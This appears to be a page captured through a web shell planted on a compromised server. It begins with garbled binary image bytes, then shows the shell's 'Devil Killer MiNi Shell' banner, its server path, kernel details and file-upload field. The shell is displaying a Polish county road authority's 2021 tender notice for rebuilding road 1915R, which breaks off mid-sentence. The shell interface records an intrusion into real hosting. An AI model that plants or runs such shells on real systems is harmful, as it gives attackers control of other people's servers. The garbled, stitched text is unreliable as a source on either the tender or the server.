JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20210630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20210630/0009944001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00099440 z dnia 2021-06-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dwóch odcinków drogi powiatowej nr 1915 R Pstrągowa - Nowa Wieś wraz z poprawą warunków bezpieczeństwa pieszych w miejscowości Nowa Wieś i Pstrągowa” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY ZARZĄD DRÓG W STRZYŻOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370488207</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Łukasiewicza 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzyżów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 2761932</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 2761932</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@strzyzow.un.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.pzd.strzyzowski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wykonywanie obowiazków zarządcy dróg powiatowych w rozumieniu przepisów ustawy o drogach publicznych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dwóch odcinków drogi powiatowej nr 1915 R Pstrągowa - Nowa Wieś wraz z poprawą warunków bezpieczeństwa pieszych w miejscowości Nowa Wieś i Pstrągowa” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b5b6a814-d980-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00099440</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00012086/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 "Przebudowa dwóch odcinków drogi powiatowej nr 1915R Pstrągowa - Nowa Wieś wraz z poprawą warunków bezpieczeństwa pieszych w miejscowości Nowa Wieś i Pstrągowa"</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.pzd.strzyzowski.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się wyłącznie przy użyciu środków w komunikacji elektronicznej<br/>https://epuap.gov.pl/wps/portal https://miniportal.uzp.gov.pl/ .<br/>pzd@strzyzow.un.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu środków<br/>w komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną (tekst jedn. Dz. U. z 2020 r. poz. 344).<br/>2. Wykonawca składa ofertę wraz z załącznikami, za pośrednictwem Formularza do złożenia, zmiany,<br/>wycofania oferty dostępnego na ePUAP https://epuap.gov.pl/wps/portal i udostępnionego również na<br/>miniPortalu https://miniportal.uzp.gov.pl/ .<br/>3. Wszelka korespondencja pomiędzy zamawiającym a wykonawcą, w tym składanie oświadczeń,<br/>wniosków, zawiadomień oraz dokumentów innych niż w Rozdziale VIII pkt 1, odbywa się przy użyciu<br/>poczty elektronicznej, na adres zamawiającego: pzd@strzyzow.un.pl<br/>4. Wykonawca musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp<br/>do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Instrukcji użytkownika miniPortalu https://miniportal.uzp.gov.pl/Instrukcja<br/>UzytkownikaSystemuMiniPortalePUAP.pdf oraz Instrukcjach ePUAP dostępnych na stronie<br/>https://epuap.gov.pl/wps/portal .<br/>6. Maksymalny rozmiar plików w przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>7. Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP.<br/>8. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń,<br/>wnioski, zawiadomienia oraz informacje, inne niż określone w Rozdziale VIII pkt 1 składane są przez<br/>Wykonawcę e-mailem na adres zamawiającego pzd@strzyzow.un.pl . W tytule wiadomości<br/>zamawiający zaleca wskazanie znaku postępowania: PZD.261.8.2021. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452<br/>z późn. zm.) oraz z rozporządzeniu Ministra Przedsiębiorczości i Technologii z dnia z dnia 23 grudnia<br/>2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415 z późn. zm.).<br/>9. Za datę przekazania dokumentów, o których mowa w pkt 9 przyjmuje się datę ich wpływu na adres<br/>poczty elektronicznej zamawiającego: pzd@strzyzow.un.pl .<br/>10. W przypadku wniesienia odwołania, odwołujący przesyła kopię odwołania zamawiającemu pocztą<br/>elektroniczną – na adres: pzd@strzyzow.un.pl .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art.13 RODO.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>a) Administratorem Państwa danych osobowych jest Powiatowy Zarząd Dróg w Strzyżowie<br/>reprezentowany przez Dyrektora Powiatowego Zarząd Dróg w Strzyżowie z siedzibą ul. Łukasiewicza<br/>33, 38-100 Strzyżów , tel./ fax. 17 27 61 932, e-mail: pzd@strzyzow.un.pl<br/>b) Inspektorem Ochrony Danych w Powiatowym Zarządzie Dróg w Strzyżowie, ul. Łukasiewicza 33,<br/>38-100 Strzyżów jest. adw. Jakub Curzytek, tel. 692 616 480, e-mail: kancelaria@adwokatcurzytek.pl.<br/>c) Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia klasycznego prowadzonym w trybie podstawowym.<br/>d) Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2018 r. poz. 1986 z późn. zm.) dalej „ustawa „pzp”.<br/>e) Państwa dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres co<br/>najmniej 4 lat od dnia zakończania postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>f) Obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest<br/>wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z Pzp.<br/>g) W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>h) Posiadają Państwo:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych *<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo,<br/>że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO;<br/>i) Nie przysługuje Państwu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD.261.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest : „Przebudowa dwóch odcinków drogi powiatowej nr 1915 R<br/>pstrągowa - Nowa Wieś wraz z poprawą warunków bezpieczeństwa pieszych w miejscowości<br/>Nowa Wieś<br/>i Pstrągowa”. Zakres prac obejmuje: roboty przygotowawcze, roboty ziemne i rozbiórkowe,<br/>wykonanie chodnika z elementami odwodnienia na długości 155 mb w m. Nowa Wieś wraz z<br/>wykonaniem koszy siatkowo – kamiennych na wlocie do przepustu, muru oporowego dla<br/>posadowienia chodnika, wykonanie umocnienia skarp geokratą i płytami ażurowymi. Wykonanie<br/>chodnika z elementami odwodnienia na długości 160 mb w m. Pstrągowa, ułożenie ścieków z<br/>elementów betonowych typ korytkowy, wykonanie robót wykończeniowych. Szczegółowy zakres<br/>robót określa przedmiar robót, wzór kosztorysu ofertowego oraz STWiORB, które stanowią<br/>załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oceniane będą wyłącznie oferty nie odrzucone oraz gdy wykonawca<br/>nie będzie podlegał wykluczeniu<br/>z postępowania.<br/>2. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się niżej opisanymi kryteriami<br/>oceny ofert:<br/>cena – 60%,<br/>gwarancja i rękojmia – 40 %.<br/>OFEROWANA CENA – waga kryterium = 60%<br/>Maksymalna ilość możliwych do uzyskania punktów w kryterium cena :<br/>PC = 60% x 100 = 60 pkt,<br/>1.Oferta z najniższą oferowaną ceną „Cmin ” otrzymuje: n = 100 pkt<br/>2.Każda inna oferta „Cbadana ” otrzymuje ilość punktów wynikającą z wyliczenia wg wzoru:<br/>n badana = [Cmin : Cbadana] x 100 = ..... pkt<br/>Ilość punktów w kryterium wyliczyć wg wzoru: PC = 0,60 x n badana<br/>gdzie:<br/>PC – punktacja w kryterium ceny<br/>n – ilość punktów w ramach kryterium ceny<br/>100 – współczynnik stały,<br/>cmin – oferta z najniższą ceną spośród ofert nieodrzuconych<br/>cbadana – cena oferty badanej,<br/>OFEROWANA GWARANCJA I RĘKOJMIA - waga kryterium = 40 %<br/>Uwaga!<br/>1. Minimalny okres gwarancji i rękojmi nie podlegający punktacji wynosi 60 miesięcy czyli oferta<br/>z 60 miesięcznym okresem gwarancji i rękojmi uzyskuje 0 pkt.<br/>2. Maksymalna długość okresu gwarancji i rękojmi podlegająca punktacji wynosi 12 miesiące przy czym<br/>łączny okres gwarancji i rękojmi wynosi 72 miesiące.<br/>3. Oferta z najdłuższym okresem gwarancji i rękojmi / 60 miesięcy wymagane przez Zamawiającego<br/>i 12 miesiące podlegające ocenie otrzymuje maksymalnie 40 pkt./<br/>4. Oferta z proponowanym okresem gwarancji i rękojmi ponad 72 miesięcy będzie oceniana jako oferta<br/>z 72 miesięcznym okresem gwarancji i rękojmi.<br/>Maksymalna ilość możliwych do uzyskania punktów w kryterium gwarancja i rękojmia :<br/>PGR = 40 % x 100 = 40 pkt<br/>1.Oferta z najdłuższym okresem gwarancji i rękojmi „GR max ” otrzymuje: n = 100 pkt<br/>2.Każda inna oferta „GR badana ” otrzymuje ilość punktów wynikającą z wyliczenia wg wzoru:<br/>n badana = [GRbadana-60miesiecy: GRmax-60 miesięcy] x 100 = ..... pkt<br/>Ilość punktów w kryterium wyliczyć wg wzoru: PGR = 0,40 x n badana<br/>gdzie<br/>PGR – punktacja w kryterium gwarancja i rękojmia<br/>n – ilość punktów w ramach kryterium<br/>100 – współczynnik stały,<br/>GR max – oferta z najdłuższym okresem gwarancji i rękojmi<br/>GR badana –długość okresu gwarancji i rękojmi oferty badanej,<br/>Łączna ilość punktów P = PC + PGR<br/>gdzie:<br/>P – punkty przyznane łącznie badanej ofercie w kryterium ceny oraz gwarancji i rękojmi,<br/>PC – punkty przyznane w kryterium ceny,<br/>PGR – punkty przyznane w kryterium gwarancji i rękojmi.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, który spełni wszystkie postawione w niniejszej SWZ<br/>warunki udziału w postępowaniu oraz otrzyma największą liczbę punktów wyliczoną jako suma<br/>punktów, zgodnie z w/w kryteriami oceny.<br/>4. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę<br/>z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i<br/>spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to<br/>z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna za spełniony warunek zdolności technicznej lub zawodowej jeżeli wykonawca<br/>w wykazie osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia<br/>i wykształcenia niezbędnych do wykonania zamawiania publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami<br/>- co najmniej<br/>1 osoby:<br/>- kierownik budowy z uprawnieniami w specjalności inżynieryjnej drogowej bez ograniczeń oraz<br/>oświadczeniem, że osoby, które będące uczestniczyć w wykonywaniu zamówienia, posiadają<br/>wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Osoba<br/>ta będzie pełniła funkcję kierownika budowy i musi posiadać aktualne zaświadczenia o przynależności do właściwej miejscowo izby samorządu zawodowego. Przez uprawnienia<br/>budowlane do kierowania robotami budowlanymi rozumie się uprawnienia do sprawowania<br/>samodzielnych funkcji technicznych<br/>w budownictwie, wydane na podstawie Prawa Budowlanego oraz Rozporządzenia Ministra<br/>Transportu<br/>i Budownictwa z dnia 11 września 2014 roku w sprawie samodzielnych funkcji technicznych<br/>w budownictwie (Dz. U. z 2014 r. poz. 1278) albo odpowiadające im inne ważne uprawnienia<br/>budowlane wydane na mocy wcześniej obowiązujących przepisów. Za samodzielną funkcje<br/>techniczną budownictwie uważa się działalność związaną z koniecznością fachowej oceny<br/>zjawisk technicznych lub samodzielnego rozwiązania zagadnień architektonicznych i<br/>technicznych oraz techniczno-organizacyjnych. Samodzielne funkcje techniczne w budownictwie<br/>mogą wykonywać wyłącznie osoby posiadające odpowiednie wykształcenie techniczne i<br/>praktykę zawodową, dostosowane do rodzaju skomplikowania działalności i innych wymagań<br/>związanych z wykonywana funkcją, stwierdzone decyzją, zwaną uprawnieniami budowlanymi<br/>(zgodnie z art. 1 Ustawy z dnia 7 lipca 1994 r. prawo budowlane (Dz. U. 2017 r. poz. 1332)<br/>Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych<br/>dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane<br/>obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz<br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stronach umowy o Europejskim<br/>Obszarze Gospodarczym, z zastrzeżeniem przepisu art. 12a ustawy prawo budowlane (Dz. U.<br/>z 2016, poz. 2902 z 